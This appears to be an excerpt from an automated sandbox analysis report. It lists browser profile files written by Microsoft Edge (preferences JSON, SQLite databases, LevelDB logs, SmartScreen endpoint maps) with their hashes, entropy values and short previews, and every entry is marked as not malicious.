                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):9495
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.11335896144518
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:192:stQkdpmV7sb9FIa34HkpRb85nbV+FbwQA4kq7NIyPZYJ:stQQmpsb9FXgbGcQxX7NI5
                                                                                                                                                                                                                                                                                                                  MD5:E0D53DF8F5941B19691694C9E1DEE993
                                                                                                                                                                                                                                                                                                                  SHA1:6474CFCBFB97ADCF2D05F5978EA4F9A4A160BF15
                                                                                                                                                                                                                                                                                                                  SHA-256:42DE68201D6864F13E006466A0E69BDCD0252C1F1700723A146CC42D9AB0F0DB
                                                                                                                                                                                                                                                                                                                  SHA-512:C939FAA0BD1D6E36C12C68BDEA72E886DC33DF17CB3E604ED96E8D7596E804203FF47DFA96A2346CBC44355EB1A1611BC7011AB63C64A6D41CDDD6163CF706D3
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13376674109197488","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340968290017037","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1,"datatype_details_migration_performed":true},"co
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (3951), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):11755
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.190465908239046
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:192:hH4vrmqRBB4W4PoiUDNaxvR5FCHFcoaSbqGEDI:hH4vrmUB6W4jR3GaSbqGEDI
                                                                                                                                                                                                                                                                                                                  MD5:07301A857C41B5854E6F84CA00B81EA0
                                                                                                                                                                                                                                                                                                                  SHA1:7441FC1018508FF4F3DBAA139A21634C08ED979C
                                                                                                                                                                                                                                                                                                                  SHA-256:2343C541E095E1D5F202E8D2A0807113E69E1969AF8E15E3644C51DB0BF33FBF
                                                                                                                                                                                                                                                                                                                  SHA-512:00ADE38E9D2F07C64648202F1D5F18A2DFB2781C0517EAEBCD567D8A77DBB7CB40A58B7C7D4EC03336A63A20D2E11DD64448F020C6FF72F06CA870AA2B4765E0
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "DefaultCohort": {.. "21f3388b-c2a5-4791-8f6e-a4cad6d17f4f.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.BingHomePage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Covid.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Finance.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Jobs.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.KnowledgeCard.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Local.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NTP3PCLICK.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NotifySearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Recipe.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.SearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Sports.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Travel.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Weather.Bubble": 1,.. "2cb2db96-3bd0-403e-abe2-9269b3761041.Bubble": 1,.
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x4, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):28672
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.3410017321959524
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:12:TLiqi/nGb0EiDFIlTSFbyrKZb9YwFOqAyl+FxOUwa5qgufTJpbZ75fOSG:TLiMNiD+lZk/Fj+6UwccNp15fBG
                                                                                                                                                                                                                                                                                                                  MD5:98643AF1CA5C0FE03CE8C687189CE56B
                                                                                                                                                                                                                                                                                                                  SHA1:ECADBA79A364D72354C658FD6EA3D5CF938F686B
                                                                                                                                                                                                                                                                                                                  SHA-256:4DC3BF7A36AB5DA80C0995FAF61ED0F96C4DE572F2D6FF9F120F9BC44B69E444
                                                                                                                                                                                                                                                                                                                  SHA-512:68B69FCE8EF5AB1DDA2994BA4DB111136BD441BC3EFC0251F57DC20A3095B8420669E646E2347EAB7BAF30CACA4BCF74BD88E049378D8DE57DE72E4B8A5FF74B
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):24853
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.56564327679101
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:768:y7rP4jWPFuM/f3a8F1+UoAYDCx9Tuqh0VfUC9xbog/OV/mz8YrwYpXtu8:y7rP4jWPIWf3au1jaCK8J4tD
                                                                                                                                                                                                                                                                                                                  MD5:CF391900AFB026F292636AD5B5E1A589
                                                                                                                                                                                                                                                                                                                  SHA1:458A7EBF2D7E00110570C5A23AE34F90A32C6967
                                                                                                                                                                                                                                                                                                                  SHA-256:941B5E4B6F187034F669335C0684290A314287831E6ED0C9ED24E7F5146CDE51
                                                                                                                                                                                                                                                                                                                  SHA-512:162E5FF66094791F5DBDB066D974E8082FC19228746C29B88EAF927668FB8646402FF78C9242AAB9C01EBEBBED4B9F33B137FBECD1BFAD6258E6CDCC6114E919
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13376674108719745","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13376674108719745","location":5,"ma
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):32768
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.05397671699173755
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:6:GtStutquyStutqu1YR9XCChslotGLNl0ml/Vl/XoQXEl:MtquMtqu1YLpEjVl/PvoQ
                                                                                                                                                                                                                                                                                                                  MD5:1AD0FBB04808E36D979406A13B3B7E04
                                                                                                                                                                                                                                                                                                                  SHA1:F8591BEABD644F2E9C09BEE6E75F56321CCF8E54
                                                                                                                                                                                                                                                                                                                  SHA-256:2EFBB4F12B4E8CB9B1A2267E926AE46F9DFD699D89B2EAD8135BA6B2BC040638
                                                                                                                                                                                                                                                                                                                  SHA-512:BD84306880FFA099645F29D52725255FDBC8FF85CBF486CB23FA9B5AAF6C877A40F7BFEC4EA1F038717051E69B19D4B99C78C25D5B5086A5C66BD0C4930774D7
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:SQLite Write-Ahead Log, version 3007000
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):86552
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.8690829635730137
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:96:9jUx1uT/r8ZNsZzMNsDKO5NszeRNsdtf81B:kmztFSyMbU
                                                                                                                                                                                                                                                                                                                  MD5:54A40CCC717AFCF7D6E96CFADE35F3F6
                                                                                                                                                                                                                                                                                                                  SHA1:07A2F340C843D45C66C3DA673A0759FE8D621712
                                                                                                                                                                                                                                                                                                                  SHA-256:821DB7CEB920A217CCE8ABA8D1421E38C7F5A65F205E36C0592B3CBF85DA55FB
                                                                                                                                                                                                                                                                                                                  SHA-512:02D7FF68B02D1D1B06972EF1B8A79D6CAC43447A2503482D019945D66D7A6A27A75F2256198F7C8CA3ECB13ECAB0DF7DDE59F01590DF53EA8C8AE63945064C10
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):419
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.687911912587677
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:6:/XntM+dll3sedhO38WrOuuuuuuuuuuuu7PsedhO7:lllc8zWrOuuuuuuuuuuuuw82
                                                                                                                                                                                                                                                                                                                  MD5:ECDCAC95AEC341266F1B5326A9B90329
                                                                                                                                                                                                                                                                                                                  SHA1:447E77E61184060EFC823046422BA46B15AC3E54
                                                                                                                                                                                                                                                                                                                  SHA-256:A606DACE3EE13FC459C6D388BCD7C320B9AB8F710E6015C6802C8E51BD332360
                                                                                                                                                                                                                                                                                                                  SHA-512:351C26EDD593F9A070AA8A260571DD01FEB9253F92B13B920AD446F262E0CFA150CBC7885603E19C6C2293CF943D2075F1B75B10E0E41D64F3347F6E648366A0
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:A..r.................20_1_1...1.,U.................20_1_1...1....0................39_config..........6.....n ....1u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=.................b0................39_config..........6.....n ....1
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):321
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.205245200715467
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:6:HE9eyq2PCHhJ23oH+TcwtfrK+IFUt8YE9I1Zmw+YEFi1RkwOCHhJ23oH+TcwtfrF:kBvBYeb23FUt8/61/+/656Yeb3J
                                                                                                                                                                                                                                                                                                                  MD5:8D12BBC212DD3FBF55C10E31DB7DCBBB
                                                                                                                                                                                                                                                                                                                  SHA1:22F21723C1ACE3F8085AA3420B9E2864551059EC
                                                                                                                                                                                                                                                                                                                  SHA-256:CC795285257A9F2C6431DBF6095946DDF23772D4B6E83C2E7440C57588FF46EC
                                                                                                                                                                                                                                                                                                                  SHA-512:B0D4D6A864E73E2CBF441EA02E861E918B25E25BC621ACBD06546B0DEDD0EAB2098A83FC2C115DE491DE4D878C7B185EACEDFB449BA0425E382B3F1020D09B6D
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:2024/11/21-09:48:29.449 4c0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/11/21-09:48:29.449 4c0 Recovering log #3.2024/11/21-09:48:29.450 4c0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):753
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.037333775091125
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:12:G0nYUtTNop//z3p/Uz0RuWlJhC+lvBavRtin01zvZDEtlkyBrgxvBs:G0nYUtypD3RUovhC+lvBOL+t3IvBs
                                                                                                                                                                                                                                                                                                                  MD5:C5675C35B320A0898802E1ECFD3476E8
                                                                                                                                                                                                                                                                                                                  SHA1:B6CA1C2EE1340662A7B495778416988006748327
                                                                                                                                                                                                                                                                                                                  SHA-256:8E60BB9B60A9A242D016CF5425FF3D76A94911F197B3E4AB08A417E39C2832A5
                                                                                                                                                                                                                                                                                                                  SHA-512:DAA3E9FADF4F69A88600460F48116E50BCE1C979E4AFA7114D1B8CCEC6626520CC3725D0BB845E0FCC8587A8690D4AC495C138AB1AAC2981CAEB9C485FA0CC67
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:.h.6.................__global... .t...................__global... .9..b.................33_..........................33_........v.................21_.....vuNX.................21_.....<...................20_.....,.1..................19_.....QL.s.................18_.....<.J|.................37_...... .A.................38_..........................39_........].................20_.....Owa..................20_.....`..N.................19_.....D8.X.................18_......`...................37_..........................38_......\e..................39_.....dz.|.................9_.....'\c..................9_.......f-.................__global... .|.&R.................__global... ./....................__global... ..T...................__global... .
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):339
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.194863260263907
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:6:HEVjyq2PCHhJ23oH+TcwtfrzAdIFUt8YEV11Zmw+YEnylRkwOCHhJ23oH+Tcwtfa:kAvBYeb9FUt8/r1/+/n656Yeb2J
                                                                                                                                                                                                                                                                                                                  MD5:005D5E4F94CD4CA5F393EA46B741CEEA
                                                                                                                                                                                                                                                                                                                  SHA1:CBCA70F93B95CA68418A92B98B6DA15C13F884FC
                                                                                                                                                                                                                                                                                                                  SHA-256:6FDCE0D1073AA0049D167CB1093BF3A2C267F106A77F571ED22A1AC47B6C8005
                                                                                                                                                                                                                                                                                                                  SHA-512:E8298824C00B5339D8A7C54E0059A8DE03EE4E2FF456787712D20B90EC436B22E6B1E94D988CF0EB79A84C0E06D390B50D78DE31DD141170EFEFE5D6B2029004
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:2024/11/21-09:48:29.206 4c0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/11/21-09:48:29.206 4c0 Recovering log #3.2024/11/21-09:48:29.429 4c0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):120
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.32524464792714
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:tbloIlrJFlXnpQoWcNylRjlgbYnPdJiG6R7lZAUAl:tbdlrYoWcV0n1IGi7kBl
                                                                                                                                                                                                                                                                                                                  MD5:A397E5983D4A1619E36143B4D804B870
                                                                                                                                                                                                                                                                                                                  SHA1:AA135A8CC2469CFD1EF2D7955F027D95BE5DFBD4
                                                                                                                                                                                                                                                                                                                  SHA-256:9C70F766D3B84FC2BB298EFA37CC9191F28BEC336329CC11468CFADBC3B137F4
                                                                                                                                                                                                                                                                                                                  SHA-512:4159EA654152D2810C95648694DD71957C84EA825FCCA87B36F7E3282A72B30EF741805C610C5FA847CA186E34BDE9C289AAA7B6931C5B257F1D11255CD2A816
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):13
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):2.7192945256669794
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:NYLFRQI:ap2I
                                                                                                                                                                                                                                                                                                                  MD5:BF16C04B916ACE92DB941EBB1AF3CB18
                                                                                                                                                                                                                                                                                                                  SHA1:FA8DAEAE881F91F61EE0EE21BE5156255429AA8A
                                                                                                                                                                                                                                                                                                                  SHA-256:7FC23C9028A316EC0AC25B09B5B0D61A1D21E58DFCF84C2A5F5B529129729098
                                                                                                                                                                                                                                                                                                                  SHA-512:F0B7DF5517596B38D57C57B5777E008D6229AB5B1841BBE74602C77EEA2252BF644B8650C7642BD466213F62E15CC7AB5A95B28E26D3907260ED1B96A74B65FB
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:117.0.2045.47
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):44170
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.0905293170759895
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4ktCLmZtxtR96hOxq4gFkFDlwWE7RTupzKscDX//NPCh:z/Ps+wsI7ynjtGhOxqQoRTuiVIos
                                                                                                                                                                                                                                                                                                                  MD5:172CA269327D025CFEF762207219D2CA
                                                                                                                                                                                                                                                                                                                  SHA1:B1C083180A984AD1188AD033F14C405DE5842CE1
                                                                                                                                                                                                                                                                                                                  SHA-256:F6E78CBF693CAD0EB08938C6700C8958BAA254F6C77A7B1558C5BF9846899800
                                                                                                                                                                                                                                                                                                                  SHA-512:FE3FC566E75C959A17F132DD97AB5857C9D931C7DDFA7C98128A1388635D9CB61304F79A1C0074F75184264C9F14743FC362943FE798EC3E5C07D4939C0768BA
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"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
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.6773696719930975
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:12:TLpUAFUxOUDaabZXiDiIF8izX4fhhdWeci2oesJaYi3islRud6zcQAJmdngzQdoO:TLiOUOq0afDdWec9sJhOs3fsuZ7J5fc
                                                                                                                                                                                                                                                                                                                  MD5:6FFCCB198DC6B17E165460E6E246B03C
                                                                                                                                                                                                                                                                                                                  SHA1:014A46B0E6E84089E1C20FA232F54CA737D5F023
                                                                                                                                                                                                                                                                                                                  SHA-256:D1B2EC8C9906C3418837FFB8E116AA59C026DE2D67B2AFDA956F14D0DC3851AF
                                                                                                                                                                                                                                                                                                                  SHA-512:846AE3D0A49A14BF82203A0FEDAD6E794F7E68C22A40EE0E014FEA99DFC676FAE4AFEB2C56F324E4361E83A35458C63E2ABAA7B28B6D23B20FA29EF47CBE87B3
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):47
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.3818353308528755
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:2jRo6jhM6ceYcUtS2djIn:5I2uxUt5Mn
                                                                                                                                                                                                                                                                                                                  MD5:48324111147DECC23AC222A361873FC5
                                                                                                                                                                                                                                                                                                                  SHA1:0DF8B2267ABBDBD11C422D23338262E3131A4223
                                                                                                                                                                                                                                                                                                                  SHA-256:D8D672F953E823063955BD9981532FC3453800C2E74C0CC3653D091088ABD3B3
                                                                                                                                                                                                                                                                                                                  SHA-512:E3B5DB7BA5E4E3DE3741F53D91B6B61D6EB9ECC8F4C07B6AE1C2293517F331B716114BAB41D7935888A266F7EBDA6FABA90023EFFEC850A929986053853F1E02
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:customSettings_F95BA787499AB4FA9EFFF472CE383A14
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):35
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.014438730983427
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:YDMGA2ADH/AYKEqsYq:YQXT/bKE1F
                                                                                                                                                                                                                                                                                                                  MD5:BB57A76019EADEDC27F04EB2FB1F1841
                                                                                                                                                                                                                                                                                                                  SHA1:8B41A1B995D45B7A74A365B6B1F1F21F72F86760
                                                                                                                                                                                                                                                                                                                  SHA-256:2BAE8302F9BD2D87AE26ACF692663DF1639B8E2068157451DA4773BD8BD30A2B
                                                                                                                                                                                                                                                                                                                  SHA-512:A455D7F8E0BE9A27CFB7BE8FE0B0E722B35B4C8F206CAD99064473F15700023D5995CC2C4FAFDB8FBB50F0BAB3EC8B241E9A512C0766AAAE1A86C3472C589FFD
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"forceServiceDetermination":false}
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):81
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.3439888556902035
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:kDnaV6bVsFUIMf1HDOWg3djTHXoSWDSQ97P:kDYaoUIe1HDM3oskP
                                                                                                                                                                                                                                                                                                                  MD5:177F4D75F4FEE84EF08C507C3476C0D2
                                                                                                                                                                                                                                                                                                                  SHA1:08E17AEB4D4066AC034207420F1F73DD8BE3FAA0
                                                                                                                                                                                                                                                                                                                  SHA-256:21EE7A30C2409E0041CDA6C04EEE72688EB92FE995DC94487FF93AD32BD8F849
                                                                                                                                                                                                                                                                                                                  SHA-512:94FC142B3CC4844BF2C0A72BCE57363C554356C799F6E581AA3012E48375F02ABD820076A8C2902A3C6BE6AC4D8FA8D4F010D4FF261327E878AF5E5EE31038FB
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):130439
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.80180718117079
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:RlIyFAMrwvaGbyLWzDr6PDofI8vsUnPRLz+PMh:weWGP7Eh
                                                                                                                                                                                                                                                                                                                  MD5:EB75CEFFE37E6DF9C171EE8380439EDA
                                                                                                                                                                                                                                                                                                                  SHA1:F00119BA869133D64E4F7F0181161BD47968FA23
                                                                                                                                                                                                                                                                                                                  SHA-256:48B11410DC937A1723BF4C5AD33ECDB286D8EC69544241BC373F753E64B396C1
                                                                                                                                                                                                                                                                                                                  SHA-512:044C5113D877CE2E3B42CF07670620937ED7BE2D8B3BF2BAB085C43EF4F64598A7AC56328DDBBE7F0F3CFB9EA49D38CA332BB4ECBFEDBE24AE53B14334A30C8E
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "geoidMaps": {.. "au": "https://australia.smartscreen.microsoft.com/",.. "ch": "https://switzerland.smartscreen.microsoft.com/",.. "eu": "https://europe.smartscreen.microsoft.com/",.. "ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "in": "https://india.smartscreen.microsoft.com/",.. "test": "https://eu-9.smartscreen.microsoft.com/",.. "uk": "https://unitedkingdom.smartscreen.microsoft.com/",.. "us": "https://unitedstates.smartscreen.microsoft.com/",.. "gw_au": "https://australia.smartscreen.microsoft.com/",.. "gw_ch": "https://switzerland.smartscreen.microsoft.com/",.. "gw_eu": "https://europe.smartscreen.microsoft.com/",.. "gw_ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "gw_ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "gw_ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "gw_in": "https
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):40
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.346439344671015
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:kfKbUPVXXMVQX:kygV5
                                                                                                                                                                                                                                                                                                                  MD5:6A3A60A3F78299444AACAA89710A64B6
